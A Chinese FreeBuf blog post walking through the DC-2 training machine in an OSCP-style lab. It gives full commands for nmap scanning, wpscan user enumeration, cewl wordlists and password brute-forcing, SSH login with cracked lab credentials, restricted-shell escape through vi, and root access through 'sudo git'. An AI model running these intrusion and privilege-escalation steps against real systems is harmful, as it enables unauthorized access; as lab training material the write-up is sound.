freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

OSCP系列靶场-Esay-DC-2
杳若 2023-07-28 17:17:48 222400
所属地 浙江省

OSCP系列靶场-Esay-DC-2

总结

getwebshell → 发现wordpressCMS→ 利用专用扫描器wpscan→ 枚举用户名 → 利用cewl生成个性化密码 → wpscan枚举密码 → 发现2个用户以及密码 → 只能登陆其中一个

提 权 思 路 → rbash逃逸 → 环境变量逃逸 → 内部利用su登录另一个用户 → sudo-git提权

准备工作

  • 启动VPN
    获取攻击机IP > 192.168.45.208

  • 启动靶机
    获取目标机器IP > 192.168.230.194

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次

sudo nmap --min-rate 10000 -p- 192.168.230.194

通过两次收集到的端口:→80,7744

目标端口对应服务探测

# tcp探测
sudo nmap -sT -sV -O -sC -p80,7744 192.168.230.194

信息收集-端口测试

发现一个是http,另一个是ssh。突破口应该在http

80-HTTP端口的信息收集

访问 http://192.168.230.194:80 发现特别慢,存在重定向,进行host绑定

host绑定

发现访问IP被重定向,修改host

vim /etc/hosts
192.168.230.194 dc-2


重新访问该端口,发现是wordpress

信息收集-网站指纹

whatweb -v http://192.168.230.194:80 

CMSWordPress 4.7.10

漏洞利用-网站指纹

msfconsole

searchsploit WordPress 4.7.10

查看了一下wordpress的内容都和插件有关

信息收集-源码查看

# 包括文章中是否写明一些敏感信息
curl http://dc-2 
# 利用html2text转换纯文本方便查看
curl http://dc-2  | html2text

没什么内容

信息收集-目录扫描

信息收集-目录扫描初步
dirsearch -u http://dc-2 -x 302,403

查看了一下目录,基本确定是由wpscan组成

漏洞探测-wpscan扫描

针对wordpress的专用扫描器

# -e枚举 ap枚举插件 u枚举用户名 t枚举主题
wpscan --url http://dc-2 --enumerate ap,u,t


发现了3个用户名adminjerrytom

信息收集-网站提示

乘着在扫描的空挡,点点点,发现有flag1的提示


提示可以用cewl生成密码字典
又点了几个端点,发现登录端点,发散思维可以爆破账户密码

漏洞利用-getwebshell

暴力破解-cewl字典生成

发现站点极具个人特色,尝试生成对应的字典

# 爬取url写入到字典
cewl http://dc-2 > passwords.txt

wpscan枚举密码

利用wpscan枚举密码

# 密码枚举
wpscan --url http://dc-2 --passwords passwords.txt


得到账号密码信息

[SUCCESS] - jerry / adipiscing                                      
[SUCCESS] - tom / parturient  


对应的账号密码是否可以用在SSH上呢?

22-SSH账号密码登录

获取账号密码之后利用SSH进行登录 发现jerry登录不上!tom登录上了

sudo ssh tom<span class="label label-primary">@192.168.230.194</span> -p7744
password > parturient  

内网遨游-getshell

刚进入之后发现连find命令都没法用,是rbash

Linux用户交互shell受限逃逸

枚举是找到突破方法的重要组成部分。

# 检查当前环境遍历可以用的命令
echo $PATH
# 查看里面的命令有哪些
ls [$PATH]


发现了4个可以用的命令
如果发现有东西的话 访问 https://gtfobins.github.io 寻找
发现了关于vishell


方法a尝试了不行,试试方法b

vi flag3.txt
-----添加-----
:set shell=/bin/sh
:shell

成功获得了一个shell


发现只获得了部分的权限,可以用cd

修改环境变量逃逸

我们通过vi获得了一个高一些的shell,查看PATH之后可以尝试修改环境变量

# 查看环境变量
echo $PATH
# 重写环境变量
PATH=/usr/bin:/bin

FLAG1获取

$ find / -name local.txt 2>/dev/null
/home/tom/local.txt
$ cat /home/tom/local.txt
***********************

权限提升

Linux提权-sudo提权尝试(失败)

查找具有sudo权限,且不需要密码的可提权文件

# 利用sudo -l寻找
sudo -l

发现需要密码,尝试失败

Linux提权-suid提权尝试(失败)

# -user 指定文件拥有者
find / -user root -perm -4000 -print 2>/dev/null
# -perm 文件权限
find / -perm -u=s -type f 2>/dev/null
# -exec 执行系统命令
find / -user root -perm -4000 -exec ls -ldb {} ;

Linux提权-登录另外用户

突然想起刚才看到的flag3.txt中提到了su
在利用wpscan时我们获取了另一个用户的密码,尝试登录另一个用户尝试

su jerry
password > adipiscing    

Linux提权-sudo提权尝试

查找具有sudo权限,且不需要密码的可提权文件

# 利用sudo -l寻找
sudo -l

发现了git命令


去查看之后选择其中的一条命令

使用了

# 使用了第二条发现成功
sudo git -p help config
# 成功提权
!/bin/sh

就是回显有点问题

FLAG2获取

cat /root/proof.txt
# **********************

完结撒花~

# 渗透测试 # 网络安全 # web安全 # 系统安全 # 网络安全技术
本文为 杳若 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
OSCP靶场系列
杳若 LV.6
这家伙太懒了,还未填写个人描述!
  • 46 文章数
  • 28 关注者
记一个奇怪的万能密码
2024-01-24
OSCP系列靶场-Esay-Monitoring
2023-09-20
OSCP系列靶场-Intermediate-BTRSys2.1
2023-09-19
文章目录